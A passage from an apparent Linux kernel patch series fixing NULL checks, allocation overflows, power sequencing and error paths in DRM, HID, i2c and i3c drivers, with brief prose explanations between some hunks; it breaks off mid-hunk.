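    static u8 last_block_checksum(const struct edid *edid)
    {
        return edid[edid->extensions].checksum;
    }
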
+diff --git a/drivers/gpu/drm/panel/panel-arm-versatile.c b/drivers/gpu/drm/panel/panel-arm-versatile.c
+index abb0788843c60..503ecea72c5ea 100644
+--- a/drivers/gpu/drm/panel/panel-arm-versatile.c
++++ b/drivers/gpu/drm/panel/panel-arm-versatile.c
+@@ -267,6 +267,8 @@ static int versatile_panel_get_modes(struct drm_panel *panel,
+ 	connector->display_info.bus_flags = vpanel->panel_type->bus_flags;
+ 
+ 	mode = drm_mode_duplicate(connector->dev, &vpanel->panel_type->mode);
++	if (!mode)
++		return -ENOMEM;
+ 	drm_mode_set_name(mode);
+ 	mode->type = DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED;
+ 
+diff --git a/drivers/gpu/drm/panel/panel-sitronix-st7703.c b/drivers/gpu/drm/panel/panel-sitronix-st7703.c
+index 86a472b01360b..b6e514aabe1d3 100644
+--- a/drivers/gpu/drm/panel/panel-sitronix-st7703.c
++++ b/drivers/gpu/drm/panel/panel-sitronix-st7703.c
+@@ -428,29 +428,30 @@ static int st7703_prepare(struct drm_panel *panel)
+ 		return 0;
+ 
+ 	dev_dbg(ctx->dev, "Resetting the panel\n");
+-	ret = regulator_enable(ctx->vcc);
++	gpiod_set_value_cansleep(ctx->reset_gpio, 1);
++
++	ret = regulator_enable(ctx->iovcc);
+ 	if (ret < 0) {
+-		dev_err(ctx->dev, "Failed to enable vcc supply: %d\n", ret);
++		dev_err(ctx->dev, "Failed to enable iovcc supply: %d\n", ret);
+ 		return ret;
+ 	}
+-	ret = regulator_enable(ctx->iovcc);
++
++	ret = regulator_enable(ctx->vcc);
+ 	if (ret < 0) {
+-		dev_err(ctx->dev, "Failed to enable iovcc supply: %d\n", ret);
+-		goto disable_vcc;
++		dev_err(ctx->dev, "Failed to enable vcc supply: %d\n", ret);
++		regulator_disable(ctx->iovcc);
++		return ret;
+ 	}
+ 
+-	gpiod_set_value_cansleep(ctx->reset_gpio, 1);
+-	usleep_range(20, 40);
++	/* Give power supplies time to stabilize before deasserting reset. */
++	usleep_range(10000, 20000);
++
+ 	gpiod_set_value_cansleep(ctx->reset_gpio, 0);
+-	msleep(20);
++	usleep_range(15000, 20000);
+ 
+ 	ctx->prepared = true;
+ 
+ 	return 0;
+-
+-disable_vcc:
+-	regulator_disable(ctx->vcc);
+-	return ret;
+ }
+ 
+ static const u32 mantix_bus_formats[] = {
+diff --git a/drivers/gpu/drm/panel/panel-tpo-tpg110.c b/drivers/gpu/drm/panel/panel-tpo-tpg110.c
+index 0b1f5a11a0554..735f1ea25c121 100644
+--- a/drivers/gpu/drm/panel/panel-tpo-tpg110.c
++++ b/drivers/gpu/drm/panel/panel-tpo-tpg110.c
+@@ -379,6 +379,8 @@ static int tpg110_get_modes(struct drm_panel *panel,
+ 	connector->display_info.bus_flags = tpg->panel_mode->bus_flags;
+ 
+ 	mode = drm_mode_duplicate(connector->dev, &tpg->panel_mode->mode);
++	if (!mode)
++		return -ENOMEM;
+ 	drm_mode_set_name(mode);
+ 	mode->type = DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED;
+ 
+diff --git a/drivers/gpu/drm/qxl/qxl_display.c b/drivers/gpu/drm/qxl/qxl_display.c
+index a152a7c6db215..f91a86225d5e7 100644
+--- a/drivers/gpu/drm/qxl/qxl_display.c
++++ b/drivers/gpu/drm/qxl/qxl_display.c
+@@ -1229,6 +1229,9 @@ int qxl_destroy_monitors_object(struct qxl_device *qdev)
+ 	if (!qdev->monitors_config_bo)
+ 		return 0;
+ 
++	kfree(qdev->dumb_heads);
++	qdev->dumb_heads = NULL;
++
+ 	qdev->monitors_config = NULL;
+ 	qdev->ram_header->monitors_config = 0;
+ 
+diff --git a/drivers/gpu/drm/radeon/radeon_connectors.c b/drivers/gpu/drm/radeon/radeon_connectors.c
+index f7431d2246044..5837af5123a9f 100644
+--- a/drivers/gpu/drm/radeon/radeon_connectors.c
++++ b/drivers/gpu/drm/radeon/radeon_connectors.c
+@@ -1122,6 +1122,8 @@ static int radeon_tv_get_modes(struct drm_connector *connector)
+ 	else {
+ 		/* only 800x600 is supported right now on pre-avivo chips */
+ 		tv_mode = drm_cvt_mode(dev, 800, 600, 60, false, false, false);
++		if (!tv_mode)
++			return 0;
+ 		tv_mode->type = DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED;
+ 		drm_mode_probed_add(connector, tv_mode);
+ 	}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+index 591c301e6cf21..1a1a286bc749f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+@@ -774,9 +774,9 @@ int vmw_surface_define_ioctl(struct drm_device *dev, void *data,
+ 	       sizeof(metadata->mip_levels));
+ 	metadata->num_sizes = num_sizes;
+ 	metadata->sizes =
+-		memdup_user((struct drm_vmw_size __user *)(unsigned long)
++		memdup_array_user((struct drm_vmw_size __user *)(unsigned long)
+ 			    req->size_addr,
+-			    sizeof(*metadata->sizes) * metadata->num_sizes);
++			    metadata->num_sizes, sizeof(*metadata->sizes));
+ 	if (IS_ERR(metadata->sizes)) {
+ 		ret = PTR_ERR(metadata->sizes);
+ 		goto out_no_sizes;
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 9a17e5cc3539b..130fc5f341422 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -365,6 +365,7 @@
+ 
+ #define USB_VENDOR_ID_DELL				0x413c
+ #define USB_DEVICE_ID_DELL_PIXART_USB_OPTICAL_MOUSE	0x301a
++#define USB_DEVICE_ID_DELL_PRO_WIRELESS_KM5221W		0x4503
+ 
+ #define USB_VENDOR_ID_DELORME		0x1163
+ #define USB_DEVICE_ID_DELORME_EARTHMATE	0x0100
+diff --git a/drivers/hid/hid-lenovo.c b/drivers/hid/hid-lenovo.c
+index 44763c0da4441..7c1b33be9d134 100644
+--- a/drivers/hid/hid-lenovo.c
++++ b/drivers/hid/hid-lenovo.c
+@@ -51,7 +51,12 @@ struct lenovo_drvdata {
+ 	int select_right;
+ 	int sensitivity;
+ 	int press_speed;
+-	u8 middlebutton_state; /* 0:Up, 1:Down (undecided), 2:Scrolling */
++	/* 0: Up
++	 * 1: Down (undecided)
++	 * 2: Scrolling
++	 * 3: Patched firmware, disable workaround
++	 */
++	u8 middlebutton_state;
+ 	bool fn_lock;
+ };
+ 
+@@ -521,6 +526,19 @@ static void lenovo_features_set_cptkbd(struct hid_device *hdev)
+ 	int ret;
+ 	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
+ 
++	/*
++	 * Tell the keyboard a driver understands it, and turn F7, F9, F11 into
++	 * regular keys
++	 */
++	ret = lenovo_send_cmd_cptkbd(hdev, 0x01, 0x03);
++	if (ret)
++		hid_warn(hdev, "Failed to switch F7/9/11 mode: %d\n", ret);
++
++	/* Switch middle button to native mode */
++	ret = lenovo_send_cmd_cptkbd(hdev, 0x09, 0x01);
++	if (ret)
++		hid_warn(hdev, "Failed to switch middle button: %d\n", ret);
++
+ 	ret = lenovo_send_cmd_cptkbd(hdev, 0x05, cptkbd_data->fn_lock);
+ 	if (ret)
+ 		hid_err(hdev, "Fn-lock setting failed: %d\n", ret);
+@@ -668,31 +686,48 @@ static int lenovo_event_cptkbd(struct hid_device *hdev,
+ {
+ 	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
+ 
+-	/* "wheel" scroll events */
+-	if (usage->type == EV_REL && (usage->code == REL_WHEEL ||
+-			usage->code == REL_HWHEEL)) {
+-		/* Scroll events disable middle-click event */
+-		cptkbd_data->middlebutton_state = 2;
+-		return 0;
+-	}
++	if (cptkbd_data->middlebutton_state != 3) {
++		/* REL_X and REL_Y events during middle button pressed
++		 * are only possible on patched, bug-free firmware
++		 * so set middlebutton_state to 3
++		 * to never apply workaround anymore
++		 */
++		if (cptkbd_data->middlebutton_state == 1 &&
++				usage->type == EV_REL &&
++				(usage->code == REL_X || usage->code == REL_Y)) {
++			cptkbd_data->middlebutton_state = 3;
++			/* send middle button press which was hold before */
++			input_event(field->hidinput->input,
++				EV_KEY, BTN_MIDDLE, 1);
++			input_sync(field->hidinput->input);
++		}
++
++		/* "wheel" scroll events */
++		if (usage->type == EV_REL && (usage->code == REL_WHEEL ||
++				usage->code == REL_HWHEEL)) {
++			/* Scroll events disable middle-click event */
++			cptkbd_data->middlebutton_state = 2;
++			return 0;
++		}
+ 
+-	/* Middle click events */
+-	if (usage->type == EV_KEY && usage->code == BTN_MIDDLE) {
+-		if (value == 1) {
+-			cptkbd_data->middlebutton_state = 1;
+-		} else if (value == 0) {
+-			if (cptkbd_data->middlebutton_state == 1) {
+-				/* No scrolling inbetween, send middle-click */
+-				input_event(field->hidinput->input,
+-					EV_KEY, BTN_MIDDLE, 1);
+-				input_sync(field->hidinput->input);
+-				input_event(field->hidinput->input,
+-					EV_KEY, BTN_MIDDLE, 0);
+-				input_sync(field->hidinput->input);
++		/* Middle click events */
++		if (usage->type == EV_KEY && usage->code == BTN_MIDDLE) {
++			if (value == 1) {
++				cptkbd_data->middlebutton_state = 1;
++			} else if (value == 0) {
++				if (cptkbd_data->middlebutton_state == 1) {
++					/* No scrolling inbetween, send middle-click */
++					input_event(field->hidinput->input,
++						EV_KEY, BTN_MIDDLE, 1);
++					input_sync(field->hidinput->input);
++					input_event(field->hidinput->input,
++						EV_KEY, BTN_MIDDLE, 0);
++					input_sync(field->hidinput->input);
++				}
++				cptkbd_data->middlebutton_state = 0;
+ 			}
+-			cptkbd_data->middlebutton_state = 0;
++			return 1;
+ 		}
+-		return 1;
+ 	}
+ 
+ 	if (usage->type == EV_KEY && usage->code == KEY_FN_ESC && value == 1) {
+@@ -1126,22 +1161,6 @@ static int lenovo_probe_cptkbd(struct hid_device *hdev)
+ 	}
+ 	hid_set_drvdata(hdev, cptkbd_data);
+ 
+-	/*
+-	 * Tell the keyboard a driver understands it, and turn F7, F9, F11 into
+-	 * regular keys (Compact only)
+-	 */
+-	if (hdev->product == USB_DEVICE_ID_LENOVO_CUSBKBD ||
+-	    hdev->product == USB_DEVICE_ID_LENOVO_CBTKBD) {
+-		ret = lenovo_send_cmd_cptkbd(hdev, 0x01, 0x03);
+-		if (ret)
+-			hid_warn(hdev, "Failed to switch F7/9/11 mode: %d\n", ret);
+-	}
+-
+-	/* Switch middle button to native mode */
+-	ret = lenovo_send_cmd_cptkbd(hdev, 0x09, 0x01);
+-	if (ret)
+-		hid_warn(hdev, "Failed to switch middle button: %d\n", ret);
+-
+ 	/* Set keyboard settings to known state */
+ 	cptkbd_data->middlebutton_state = 0;
+ 	cptkbd_data->fn_lock = true;
+@@ -1264,6 +1283,24 @@ err:
+ 	return ret;
+ }
+ 
++#ifdef CONFIG_PM
++static int lenovo_reset_resume(struct hid_device *hdev)
++{
++	switch (hdev->product) {
++	case USB_DEVICE_ID_LENOVO_CUSBKBD:
++	case USB_DEVICE_ID_LENOVO_TPIIUSBKBD:
++		if (hdev->type == HID_TYPE_USBMOUSE)
++			lenovo_features_set_cptkbd(hdev);
++
++		break;
++	default:
++		break;
++	}
++
++	return 0;
++}
++#endif
++
+ static void lenovo_remove_tpkbd(struct hid_device *hdev)
+ {
+ 	struct lenovo_drvdata *data_pointer = hid_get_drvdata(hdev);
+@@ -1380,6 +1417,9 @@ static struct hid_driver lenovo_driver = {
+ 	.raw_event = lenovo_raw_event,
+ 	.event = lenovo_event,
+ 	.report_fixup = lenovo_report_fixup,
++#ifdef CONFIG_PM
++	.reset_resume = lenovo_reset_resume,
++#endif
+ };
+ module_hid_driver(lenovo_driver);
+ 
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index f8f20a7c24b17..056bb32091285 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -66,6 +66,7 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CORSAIR, USB_DEVICE_ID_CORSAIR_STRAFE), HID_QUIRK_NO_INIT_REPORTS | HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CREATIVELABS, USB_DEVICE_ID_CREATIVE_SB_OMNI_SURROUND_51), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_DELL, USB_DEVICE_ID_DELL_PIXART_USB_OPTICAL_MOUSE), HID_QUIRK_ALWAYS_POLL },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_DELL, USB_DEVICE_ID_DELL_PRO_WIRELESS_KM5221W), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_DMI, USB_DEVICE_ID_DMI_ENC), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_DRACAL_RAPHNET, USB_DEVICE_ID_RAPHNET_2NES2SNES), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_DRACAL_RAPHNET, USB_DEVICE_ID_RAPHNET_4NES4SNES), HID_QUIRK_MULTI_INPUT },
+diff --git a/drivers/i2c/busses/i2c-designware-master.c b/drivers/i2c/busses/i2c-designware-master.c
+index 004ccb2d9f369..948d547690c64 100644
+--- a/drivers/i2c/busses/i2c-designware-master.c
++++ b/drivers/i2c/busses/i2c-designware-master.c
+@@ -456,10 +456,16 @@ i2c_dw_xfer_msg(struct dw_i2c_dev *dev)
+ 
+ 		/*
+ 		 * Because we don't know the buffer length in the
+-		 * I2C_FUNC_SMBUS_BLOCK_DATA case, we can't stop
+-		 * the transaction here.
++		 * I2C_FUNC_SMBUS_BLOCK_DATA case, we can't stop the
++		 * transaction here. Also disable the TX_EMPTY IRQ
++		 * while waiting for the data length byte to avoid the
++		 * bogus interrupts flood.
+ 		 */
+-		if (buf_len > 0 || flags & I2C_M_RECV_LEN) {
++		if (flags & I2C_M_RECV_LEN) {
++			dev->status |= STATUS_WRITE_IN_PROGRESS;
++			intr_mask &= ~DW_IC_INTR_TX_EMPTY;
++			break;
++		} else if (buf_len > 0) {
+ 			/* more bytes to be written */
+ 			dev->status |= STATUS_WRITE_IN_PROGRESS;
+ 			break;
+@@ -495,6 +501,13 @@ i2c_dw_recv_len(struct dw_i2c_dev *dev, u8 len)
+ 	msgs[dev->msg_read_idx].len = len;
+ 	msgs[dev->msg_read_idx].flags &= ~I2C_M_RECV_LEN;
+ 
++	/*
++	 * Received buffer length, re-enable TX_EMPTY interrupt
++	 * to resume the SMBUS transaction.
++	 */
++	regmap_update_bits(dev->map, DW_IC_INTR_MASK, DW_IC_INTR_TX_EMPTY,
++			   DW_IC_INTR_TX_EMPTY);
++
+ 	return len;
+ }
+ 
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index da1f6b60f9c9a..3159ffbb77a20 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -690,15 +690,11 @@ static int i801_block_transaction_byte_by_byte(struct i801_priv *priv,
+ 		return i801_check_post(priv, result ? priv->status : -ETIMEDOUT);
+ 	}
+ 
+-	for (i = 1; i <= len; i++) {
+-		if (i == len && read_write == I2C_SMBUS_READ)
+-			smbcmd |= SMBHSTCNT_LAST_BYTE;
+-		outb_p(smbcmd, SMBHSTCNT(priv));
+-
+-		if (i == 1)
+-			outb_p(inb(SMBHSTCNT(priv)) | SMBHSTCNT_START,
+-			       SMBHSTCNT(priv));
++	if (len == 1 && read_write == I2C_SMBUS_READ)
++		smbcmd |= SMBHSTCNT_LAST_BYTE;
++	outb_p(smbcmd | SMBHSTCNT_START, SMBHSTCNT(priv));
+ 
++	for (i = 1; i <= len; i++) {
+ 		status = i801_wait_byte_done(priv);
+ 		if (status)
+ 			goto exit;
+@@ -721,9 +717,12 @@ static int i801_block_transaction_byte_by_byte(struct i801_priv *priv,
+ 			data->block[0] = len;
+ 		}
+ 
+-		/* Retrieve/store value in SMBBLKDAT */
+-		if (read_write == I2C_SMBUS_READ)
++		if (read_write == I2C_SMBUS_READ) {
+ 			data->block[i] = inb_p(SMBBLKDAT(priv));
++			if (i == len - 1)
++				outb_p(smbcmd | SMBHSTCNT_LAST_BYTE, SMBHSTCNT(priv));
++		}
++
+ 		if (read_write == I2C_SMBUS_WRITE && i+1 <= len)
+ 			outb_p(data->block[i+1], SMBBLKDAT(priv));
+ 
+diff --git a/drivers/i2c/busses/i2c-pxa.c b/drivers/i2c/busses/i2c-pxa.c
+index b605b6e43cb90..ade3f0ea59551 100644
+--- a/drivers/i2c/busses/i2c-pxa.c
++++ b/drivers/i2c/busses/i2c-pxa.c
+@@ -264,6 +264,9 @@ struct pxa_i2c {
+ 	u32			hs_mask;
+ 
+ 	struct i2c_bus_recovery_info recovery;
++	struct pinctrl		*pinctrl;
++	struct pinctrl_state	*pinctrl_default;
++	struct pinctrl_state	*pinctrl_recovery;
+ };
+ 
+ #define _IBMR(i2c)	((i2c)->reg_ibmr)
+@@ -1302,12 +1305,13 @@ static void i2c_pxa_prepare_recovery(struct i2c_adapter *adap)
+ 	 */
+ 	gpiod_set_value(i2c->recovery.scl_gpiod, ibmr & IBMR_SCLS);
+ 	gpiod_set_value(i2c->recovery.sda_gpiod, ibmr & IBMR_SDAS);
++
++	WARN_ON(pinctrl_select_state(i2c->pinctrl, i2c->pinctrl_recovery));
+ }
+ 
+ static void i2c_pxa_unprepare_recovery(struct i2c_adapter *adap)
+ {
+ 	struct pxa_i2c *i2c = adap->algo_data;
+-	struct i2c_bus_recovery_info *bri = adap->bus_recovery_info;
+ 	u32 isr;
+ 
+ 	/*
+@@ -1321,7 +1325,7 @@ static void i2c_pxa_unprepare_recovery(struct i2c_adapter *adap)
+ 		i2c_pxa_do_reset(i2c);
+ 	}
+ 
+-	WARN_ON(pinctrl_select_state(bri->pinctrl, bri->pins_default));
++	WARN_ON(pinctrl_select_state(i2c->pinctrl, i2c->pinctrl_default));
+ 
+ 	dev_dbg(&i2c->adap.dev, "recovery: IBMR 0x%08x ISR 0x%08x\n",
+ 	        readl(_IBMR(i2c)), readl(_ISR(i2c)));
+@@ -1343,20 +1347,76 @@ static int i2c_pxa_init_recovery(struct pxa_i2c *i2c)
+ 	if (IS_ENABLED(CONFIG_I2C_PXA_SLAVE))
+ 		return 0;
+ 
+-	bri->pinctrl = devm_pinctrl_get(dev);
+-	if (PTR_ERR(bri->pinctrl) == -ENODEV) {
+-		bri->pinctrl = NULL;
++	i2c->pinctrl = devm_pinctrl_get(dev);
++	if (PTR_ERR(i2c->pinctrl) == -ENODEV)
++		i2c->pinctrl = NULL;
++	if (IS_ERR(i2c->pinctrl))
++		return PTR_ERR(i2c->pinctrl);
++
++	if (!i2c->pinctrl)
++		return 0;
++
++	i2c->pinctrl_default = pinctrl_lookup_state(i2c->pinctrl,
++						    PINCTRL_STATE_DEFAULT);
++	i2c->pinctrl_recovery = pinctrl_lookup_state(i2c->pinctrl, "recovery");
++
++	if (IS_ERR(i2c->pinctrl_default) || IS_ERR(i2c->pinctrl_recovery)) {
++		dev_info(dev, "missing pinmux recovery information: %ld %ld\n",
++			 PTR_ERR(i2c->pinctrl_default),
++			 PTR_ERR(i2c->pinctrl_recovery));
++		return 0;
++	}
++
++	/*
++	 * Claiming GPIOs can influence the pinmux state, and may glitch the
++	 * I2C bus. Do this carefully.
++	 */
++	bri->scl_gpiod = devm_gpiod_get(dev, "scl", GPIOD_OUT_HIGH_OPEN_DRAIN);
++	if (bri->scl_gpiod == ERR_PTR(-EPROBE_DEFER))
++		return -EPROBE_DEFER;
++	if (IS_ERR(bri->scl_gpiod)) {
++		dev_info(dev, "missing scl gpio recovery information: %pe\n",
++			 bri->scl_gpiod);
++		return 0;
++	}
++
++	/*
++	 * We have SCL. Pull SCL low and wait a bit so that SDA glitches
++	 * have no effect.
++	 */
++	gpiod_direction_output(bri->scl_gpiod, 0);
++	udelay(10);
++	bri->sda_gpiod = devm_gpiod_get(dev, "sda", GPIOD_OUT_HIGH_OPEN_DRAIN);
++
++	/* Wait a bit in case of a SDA glitch, and then release SCL. */
++	udelay(10);
++	gpiod_direction_output(bri->scl_gpiod, 1);
++
++	if (bri->sda_gpiod == ERR_PTR(-EPROBE_DEFER))
++		return -EPROBE_DEFER;
++
++	if (IS_ERR(bri->sda_gpiod)) {
++		dev_info(dev, "missing sda gpio recovery information: %pe\n",
++			 bri->sda_gpiod);
+ 		return 0;
+ 	}
+-	if (IS_ERR(bri->pinctrl))
+-		return PTR_ERR(bri->pinctrl);
+ 
+ 	bri->prepare_recovery = i2c_pxa_prepare_recovery;
+ 	bri->unprepare_recovery = i2c_pxa_unprepare_recovery;
++	bri->recover_bus = i2c_generic_scl_recovery;
+ 
+ 	i2c->adap.bus_recovery_info = bri;
+ 
+-	return 0;
++	/*
++	 * Claiming GPIOs can change the pinmux state, which confuses the
++	 * pinctrl since pinctrl's idea of the current setting is unaffected
++	 * by the pinmux change caused by claiming the GPIO. Work around that
++	 * by switching pinctrl to the GPIO state here. We do it this way to
++	 * avoid glitching the I2C bus.
++	 */
++	pinctrl_select_state(i2c->pinctrl, i2c->pinctrl_recovery);
++
++	return pinctrl_select_state(i2c->pinctrl, i2c->pinctrl_default);
+ }
+ 
+ static int i2c_pxa_probe(struct platform_device *dev)
+diff --git a/drivers/i2c/busses/i2c-sun6i-p2wi.c b/drivers/i2c/busses/i2c-sun6i-p2wi.c
+index 9e3483f507ff5..f2ed13b551088 100644
+--- a/drivers/i2c/busses/i2c-sun6i-p2wi.c
++++ b/drivers/i2c/busses/i2c-sun6i-p2wi.c
+@@ -201,6 +201,11 @@ static int p2wi_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
++	if (clk_freq == 0) {
++		dev_err(dev, "clock-frequency is set to 0 in DT\n");
++		return -EINVAL;
++	}
++
+ 	if (of_get_child_count(np) > 1) {
+ 		dev_err(dev, "P2WI only supports one slave device\n");
+ 		return -EINVAL;
+diff --git a/drivers/i2c/i2c-core-base.c b/drivers/i2c/i2c-core-base.c
+index 7539b0740351d..5e3976ba52650 100644
+--- a/drivers/i2c/i2c-core-base.c
++++ b/drivers/i2c/i2c-core-base.c
+@@ -916,8 +916,9 @@ int i2c_dev_irq_from_resources(const struct resource *resources,
+ struct i2c_client *
+ i2c_new_client_device(struct i2c_adapter *adap, struct i2c_board_info const *info)
+ {
+-	struct i2c_client	*client;
+-	int			status;
++	struct i2c_client *client;
++	bool need_put = false;
++	int status;
+ 
+ 	client = kzalloc(sizeof *client, GFP_KERNEL);
+ 	if (!client)
+@@ -955,7 +956,6 @@ i2c_new_client_device(struct i2c_adapter *adap, struct i2c_board_info const *inf
+ 	client->dev.fwnode = info->fwnode;
+ 
+ 	device_enable_async_suspend(&client->dev);
+-	i2c_dev_set_name(adap, client, info);
+ 
+ 	if (info->swnode) {
+ 		status = device_add_software_node(&client->dev, info->swnode);
+@@ -967,6 +967,7 @@ i2c_new_client_device(struct i2c_adapter *adap, struct i2c_board_info const *inf
+ 		}
+ 	}
+ 
++	i2c_dev_set_name(adap, client, info);
+ 	status = device_register(&client->dev);
+ 	if (status)
+ 		goto out_remove_swnode;
+@@ -978,6 +979,7 @@ i2c_new_client_device(struct i2c_adapter *adap, struct i2c_board_info const *inf
+ 
+ out_remove_swnode:
+ 	device_remove_software_node(&client->dev);
++	need_put = true;
+ out_err_put_of_node:
+ 	of_node_put(info->of_node);
+ out_err:
+@@ -985,7 +987,10 @@ out_err:
+ 		"Failed to register i2c client %s at 0x%02x (%d)\n",
+ 		client->name, client->addr, status);
+ out_err_silent:
+-	kfree(client);
++	if (need_put)
++		put_device(&client->dev);
++	else
++		kfree(client);
+ 	return ERR_PTR(status);
+ }
+ EXPORT_SYMBOL_GPL(i2c_new_client_device);
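The i2c-core fix is about which destructor each error path may use: once device_register() has been attempted, the struct device is initialized and may hold extra references, so unwinding has to go through put_device() and let the release() callback free the memory; a raw kfree() there risks a double free. Failures before registration can still kfree() directly. The rule in miniature:

    status = device_register(&client->dev);
    if (status) {
        put_device(&client->dev);   /* drops the ref; release() kfree()s */
        return ERR_PTR(status);
    }
    /* ...whereas paths that fail before device_register() may kfree(client). */
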
+diff --git a/drivers/i2c/i2c-core.h b/drivers/i2c/i2c-core.h
+index 1247e6e6e9751..05b8b8dfa9bdd 100644
+--- a/drivers/i2c/i2c-core.h
++++ b/drivers/i2c/i2c-core.h
+@@ -29,7 +29,7 @@ int i2c_dev_irq_from_resources(const struct resource *resources,
+  */
+ static inline bool i2c_in_atomic_xfer_mode(void)
+ {
+-	return system_state > SYSTEM_RUNNING && irqs_disabled();
++	return system_state > SYSTEM_RUNNING && !preemptible();
+ }
+ 
+ static inline int __i2c_lock_bus_helper(struct i2c_adapter *adap)
+diff --git a/drivers/i2c/i2c-dev.c b/drivers/i2c/i2c-dev.c
+index ab0adaa130dae..dd35f341b16fd 100644
+--- a/drivers/i2c/i2c-dev.c
++++ b/drivers/i2c/i2c-dev.c
+@@ -450,8 +450,8 @@ static long i2cdev_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ 		if (rdwr_arg.nmsgs > I2C_RDWR_IOCTL_MAX_MSGS)
+ 			return -EINVAL;
+ 
+-		rdwr_pa = memdup_user(rdwr_arg.msgs,
+-				      rdwr_arg.nmsgs * sizeof(struct i2c_msg));
++		rdwr_pa = memdup_array_user(rdwr_arg.msgs,
++					    rdwr_arg.nmsgs, sizeof(struct i2c_msg));
+ 		if (IS_ERR(rdwr_pa))
+ 			return PTR_ERR(rdwr_pa);
+ 
+diff --git a/drivers/i3c/master/i3c-master-cdns.c b/drivers/i3c/master/i3c-master-cdns.c
+index 5b37ffe5ad5be..4a49c75a9408c 100644
+--- a/drivers/i3c/master/i3c-master-cdns.c
++++ b/drivers/i3c/master/i3c-master-cdns.c
+@@ -192,7 +192,7 @@
+ #define SLV_STATUS1_HJ_DIS		BIT(18)
+ #define SLV_STATUS1_MR_DIS		BIT(17)
+ #define SLV_STATUS1_PROT_ERR		BIT(16)
+-#define SLV_STATUS1_DA(x)		(((s) & GENMASK(15, 9)) >> 9)
++#define SLV_STATUS1_DA(s)		(((s) & GENMASK(15, 9)) >> 9)
+ #define SLV_STATUS1_HAS_DA		BIT(8)
+ #define SLV_STATUS1_DDR_RX_FULL		BIT(7)
+ #define SLV_STATUS1_DDR_TX_FULL		BIT(6)
+@@ -1624,13 +1624,13 @@ static int cdns_i3c_master_probe(struct platform_device *pdev)
+ 	/* Device ID0 is reserved to describe this master. */
+ 	master->maxdevs = CONF_STATUS0_DEVS_NUM(val);
+ 	master->free_rr_slots = GENMASK(master->maxdevs, 1);
++	master->caps.ibirfifodepth = CONF_STATUS0_IBIR_DEPTH(val);
++	master->caps.cmdrfifodepth = CONF_STATUS0_CMDR_DEPTH(val);
+ 
+ 	val = readl(master->regs + CONF_STATUS1);
+ 	master->caps.cmdfifodepth = CONF_STATUS1_CMD_DEPTH(val);
+ 	master->caps.rxfifodepth = CONF_STATUS1_RX_DEPTH(val);
+ 	master->caps.txfifodepth = CONF_STATUS1_TX_DEPTH(val);
+-	master->caps.ibirfifodepth = CONF_STATUS0_IBIR_DEPTH(val);
+-	master->caps.cmdrfifodepth = CONF_STATUS0_CMDR_DEPTH(val);
+ 
+ 	spin_lock_init(&master->ibi.lock);
+ 	master->ibi.num_slots = CONF_STATUS1_IBI_HW_RES(val);
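Besides moving the IBIR/CMDR FIFO-depth reads onto CONF_STATUS0, where those fields actually live, the cdns hunk fixes a classic macro bug: SLV_STATUS1_DA() took parameter x while its body used s, so it compiled only by capturing whatever variable named s happened to be in scope at the call site. A reduced example of the pitfall, with made-up names:

    #define LOW7_BAD(x)  (((s) & GENMASK(15, 9)) >> 9)   /* expands caller's 's' */
    #define LOW7(s)      (((s) & GENMASK(15, 9)) >> 9)   /* parameter is used    */
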
+diff --git a/drivers/i3c/master/mipi-i3c-hci/dat_v1.c b/drivers/i3c/master/mipi-i3c-hci/dat_v1.c
+index 97bb49ff5b53b..47b9b4d4ed3fc 100644
+--- a/drivers/i3c/master/mipi-i3c-hci/dat_v1.c
++++ b/drivers/i3c/master/mipi-i3c-hci/dat_v1.c
+@@ -64,15 +64,17 @@ static int hci_dat_v1_init(struct i3c_hci *hci)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	/* use a bitmap for faster free slot search */
+-	hci->DAT_data = bitmap_zalloc(hci->DAT_entries, GFP_KERNEL);
+-	if (!hci->DAT_data)
+-		return -ENOMEM;
+-
+-	/* clear them */
+-	for (dat_idx = 0; dat_idx < hci->DAT_entries; dat_idx++) {
+-		dat_w0_write(dat_idx, 0);
+-		dat_w1_write(dat_idx, 0);
++	if (!hci->DAT_data) {
++		/* use a bitmap for faster free slot search */
++		hci->DAT_data = bitmap_zalloc(hci->DAT_entries, GFP_KERNEL);
++		if (!hci->DAT_data)
++			return -ENOMEM;
++
++		/* clear them */
++		for (dat_idx = 0; dat_idx < hci->DAT_entries; dat_idx++) {
++			dat_w0_write(dat_idx, 0);
++			dat_w1_write(dat_idx, 0);
++		}
+ 	}
+ 
+ 	return 0;
+@@ -87,7 +89,13 @@ static void hci_dat_v1_cleanup(struct i3c_hci *hci)
+ static int hci_dat_v1_alloc_entry(struct i3c_hci *hci)
+ {
+ 	unsigned int dat_idx;
++	int ret;
+ 
++	if (!hci->DAT_data) {
++		ret = hci_dat_v1_init(hci);
